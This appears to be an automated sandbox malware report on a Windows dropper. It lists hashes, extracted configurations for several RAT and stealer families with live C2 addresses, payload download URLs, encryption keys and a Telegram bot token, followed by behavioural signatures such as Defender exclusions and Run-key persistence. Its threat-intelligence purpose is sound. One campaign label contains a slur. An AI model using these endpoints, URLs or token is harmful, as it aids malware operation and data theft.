Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
550s -
max time network
577s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26-11-2024 19:24
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
http://unvdwl.com/un2/botprnt.dat
Extracted
xworm
91.92.240.41:7000
-
Install_directory
%ProgramData%
-
install_file
voldec.exe
Extracted
redline
@OLEH_PSP
65.21.18.51:45580
Extracted
redline
bundle
185.215.113.67:15206
Extracted
asyncrat
1.0.7
Default
217.195.195.46:1604
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.0
Office04
microsoftsys.ddns.net:4782
67e0653d-eedf-4888-88ab-78e97eb2df27
-
encryption_key
23E5F6D22FEE1750D36544A759A48349B064BC34
-
install_name
PerfWatson1.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
KDOT
Extracted
lumma
https://servicedny.site
https://authorisev.site
https://faulteyotk.site
https://dilemmadu.site
https://contemteny.site
https://goalyfeastz.site
https://opposezmny.site
https://seallysl.site
https://thighpecr.cyou
Extracted
xworm
5.0
154.197.69.165:7000
62.113.117.95:5665
wPxAiY3vITAPeZGc
-
Install_directory
%AppData%
-
install_file
System.exe
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
njrat
Njrat 0.7 Golden By Hassan Amiri
HacKed
82.193.104.21:5137
Windows Update
-
reg_key
Windows Update
-
splitter
|Hassan|
Extracted
quasar
1.4.1
Nigga
yzs-42879.portmap.host:42879
57d72303-b5e9-46aa-8cc4-9690809c1a9e
-
encryption_key
F1EBDB1862062F9265C0B5AC4D02C76D026534D0
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
Temp
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Extracted
gurcu
https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessag
Signatures
-
Asyncrat family
-
BabbleLoader
BabbleLoader is a malware loader written in C++.
-
Babbleloader family
-
Detect Xworm Payload 7 IoCs
resource yara_rule behavioral1/memory/3880-26-0x0000000000540000-0x000000000055A000-memory.dmp family_xworm behavioral1/files/0x002d000000045083-539.dat family_xworm behavioral1/files/0x002b000000045085-551.dat family_xworm behavioral1/memory/916-611-0x0000000000620000-0x0000000000630000-memory.dmp family_xworm behavioral1/memory/2188-671-0x0000000000400000-0x00000000004CC000-memory.dmp family_xworm behavioral1/files/0x00280000000451ba-3913.dat family_xworm behavioral1/memory/5328-3970-0x0000000000EE0000-0x0000000000F30000-memory.dmp family_xworm -
Detects BabbleLoader Payload 1 IoCs
resource yara_rule behavioral1/files/0x002900000004519f-1875.dat family_babbleloader -
Gurcu family
-
Lumma family
-
Njrat family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x00280000000451bd-4007.dat family_phorphiex -
Quasar family
-
Quasar payload 4 IoCs
resource yara_rule behavioral1/files/0x000300000000033f-447.dat family_quasar behavioral1/memory/4832-455-0x00000000001C0000-0x00000000004E4000-memory.dmp family_quasar behavioral1/files/0x002c0000000451ad-3834.dat family_quasar behavioral1/memory/3864-3844-0x00000000002A0000-0x00000000005C4000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/files/0x0004000000043388-248.dat family_redline behavioral1/memory/4220-258-0x0000000000890000-0x00000000008E2000-memory.dmp family_redline behavioral1/files/0x000800000000036d-294.dat family_redline behavioral1/memory/4072-304-0x00000000005A0000-0x00000000005F2000-memory.dmp family_redline behavioral1/memory/3000-4028-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 2268 created 3572 2268 app64.exe 57 PID 5960 created 3572 5960 Ewpeloxttug.exe 57 PID 5884 created 3572 5884 1144032267.exe 57 PID 5884 created 3572 5884 1144032267.exe 57 PID 1028 created 3572 1028 winupsecvmgr.exe 57 PID 1028 created 3572 1028 winupsecvmgr.exe 57 PID 1028 created 3572 1028 winupsecvmgr.exe 57 -
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
Xred family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002800000004507e-328.dat family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 322 5320 powershell.exe 345 5320 powershell.exe 385 5320 powershell.exe 419 5320 powershell.exe 460 5320 powershell.exe 571 5736 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3600 powershell.exe 1236 powershell.exe 1464 powershell.exe 5544 powershell.exe 4816 powershell.exe 5636 powershell.exe 3372 powershell.exe 3932 powershell.exe 3540 powershell.exe 4508 powershell.exe 516 powershell.exe 4192 powershell.exe 680 powershell.exe 844 powershell.exe 1296 powershell.exe 1184 powershell.exe 4492 powershell.exe 5320 powershell.exe 6092 powershell.exe 1992 powershell.exe 5580 powershell.exe 5736 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts LicenseMalwareBytes.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1668 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\x149796\Parameters\ServiceDll = "C:\\Windows\\System32\\x149796.dat" reg.exe -
Checks computer location settings 2 TTPs 34 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation System.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation crypteda.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation 2164521646.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation ._cache_System.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation GoodFrag.exe Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation PerfWatson1.exe -
Deletes itself 1 IoCs
pid Process 3536 bav64.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk ._cache_System.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk ._cache_System.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUtil.vbs Ewpeloxttug.exe -
Executes dropped EXE 64 IoCs
pid Process 772 cudo.exe 940 svcsys 1636 7777.exe 3652 j86piuq9.exe 1472 legas.exe 4616 sgGWFhcaHD.exe 3116 Njx11RiiEL.exe 1976 crypteda.exe 3420 FvPeQhIfo6.exe 4220 YpJU1SdRN0.exe 4432 svcsys 4072 bundle.exe 3960 w.exe 1284 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 4832 built.exe 3412 PerfWatson1.exe 4440 PerfWatson1.exe 2848 PerfWatson1.exe 1796 23c2343.exe 1984 svcsys 5048 yxrd0ob7.exe 3924 PerfWatson1.exe 3020 yxrd0ob7.exe 3796 yxrd0ob7.exe 4300 PerfWatson1.exe 1588 GoodFrag.exe 2188 System.exe 916 ._cache_System.exe 4744 Synaptics.exe 436 Runtime Broker.exe 2320 PerfWatson1.exe 2592 PerfWatson1.exe 2192 maza-0.16.3-win32-setup-unsigned.exe 4828 PerfWatson1.exe 1676 svcsys 2968 PerfWatson1.exe 1716 PerfWatson1.exe 2188 PerfWatson1.exe 3036 test10.exe 752 PerfWatson1.exe 3184 Server.exe 1676 NoMoreRansom.exe 5096 PerfWatson1.exe 2764 PerfWatson1.exe 3204 Eszop.exe 5152 svcsys 5296 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5844 zzzz1.exe 5888 PerfWatson1.exe 6132 Eszop.exe 1928 major.exe 2400 PerfWatson1.exe 700 PerfWatson1.exe 5440 PerfWatson1.exe 5960 Ewpeloxttug.exe 3864 RuntimeBroker.exe 2936 torque.exe 3080 PerfWatson1.exe 2900 RuntimeBroker.exe 4620 BaddStore.exe 2268 app64.exe 5328 ._cache_aspnet_regiis.exe -
Loads dropped DLL 58 IoCs
pid Process 772 cudo.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 2192 maza-0.16.3-win32-setup-unsigned.exe 2192 maza-0.16.3-win32-setup-unsigned.exe 2192 maza-0.16.3-win32-setup-unsigned.exe 2192 maza-0.16.3-win32-setup-unsigned.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 5644 LicenseMalwareBytes.exe 4620 BaddStore.exe 5996 printui.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 3136 svchost.exe 1236 console_zero.exe 1236 console_zero.exe 5276 NETFXSBS10.exe 5624 printui.exe 5624 printui.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Server.exe\" .." Server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" t.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svcsys = "C:\\ProgramData\\svcsys" MSBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" System.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" NoMoreRansom.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Server.exe\" .." Server.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 1568 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 521 raw.githubusercontent.com 525 raw.githubusercontent.com 66 raw.githubusercontent.com 67 raw.githubusercontent.com 74 raw.githubusercontent.com 480 raw.githubusercontent.com 481 raw.githubusercontent.com 516 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 123 ip-api.com 442 ipinfo.io 443 ipinfo.io 25 ip-api.com -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\System32\x149796.dat printui.exe File created C:\Windows\System32\svcldr64.dat printui.exe File created C:\Windows\System32\zlib1.dll printui.exe File created C:\Windows\System32\libcrypto-3-x64.dll printui.exe File created C:\Windows\System32\libintl-9.dll printui.exe File created \??\c:\windows\system32\winsvcf\WinRing0x64.sys svchost.exe File created C:\Windows\System32\libcurl.dll printui.exe File created C:\Windows\System32\libiconv-2.dll printui.exe File created C:\Windows\System32\libwinpthread-1.dll printui.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\System32\usvcinsta64.exe pyld64.exe File created C:\Windows\System32\vcruntime140d.dll printui.exe File created C:\Windows\System32\libssl-3-x64.dll printui.exe File opened for modification \??\c:\windows\system32\crypti.exe svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification \??\c:\windows\system32\winsvcf\winlogsvc svchost.exe File created \??\c:\windows\system32\winsvcf\x936769.dat svchost.exe File created \??\c:\windows\system32\winsvcf\x397670.dat svchost.exe File created \??\c:\windows\system32\winsvcf\x138062.exe svchost.exe File created C:\Windows\System32\bav64.exe printui.exe File created C:\Windows\System32\winsvcf\winlogsvc printui.exe File created C:\Windows\System32\console_zero.exe printui.exe File created \??\c:\windows\system32\crypti.exe svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\System32\libpq.dll printui.exe File created C:\Windows\System32\ucrtbased.dll printui.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 772 set thread context of 3880 772 cudo.exe 87 PID 1472 set thread context of 4008 1472 legas.exe 108 PID 5048 set thread context of 3796 5048 yxrd0ob7.exe 161 PID 5844 set thread context of 3000 5844 zzzz1.exe 288 PID 4620 set thread context of 3328 4620 BaddStore.exe 320 PID 892 set thread context of 3000 892 cc2.exe 336 PID 5960 set thread context of 5476 5960 Ewpeloxttug.exe 363 PID 1636 set thread context of 3728 1636 7777.exe 428 PID 1028 set thread context of 5888 1028 winupsecvmgr.exe 439 PID 1028 set thread context of 5852 1028 winupsecvmgr.exe 447 PID 3652 set thread context of 5276 3652 j86piuq9.exe 470 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe t.exe File opened for modification C:\Windows\sysnldcvmr.exe t.exe File created C:\Windows\Tasks\Test Task17.job Ewpeloxttug.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5952 sc.exe 2900 sc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x0028000000045081-343.dat pyinstaller behavioral1/files/0x00500000000450bf-1775.dat pyinstaller -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x00280000000451bf-4103.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 1248 1472 WerFault.exe 107 4712 5048 WerFault.exe 155 -
System Location Discovery: System Language Discovery 1 TTPs 55 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 303059389.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language j86piuq9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvPeQhIfo6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yxrd0ob7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2424925859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lummetc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7777.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YpJU1SdRN0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language System.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reverse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ewpeloxttug.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NETFXSBS10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3588619235.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zzzz1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cudo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BaddStore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ewrvuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language maza-0.16.3-win32-setup-unsigned.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ewpeloxttug.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regiis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bundle.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoodFrag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NoMoreRansom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language legas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yxrd0ob7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language t.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 99424430.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcsys -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 28 IoCs
Adversaries may check for Internet connectivity on compromised systems.
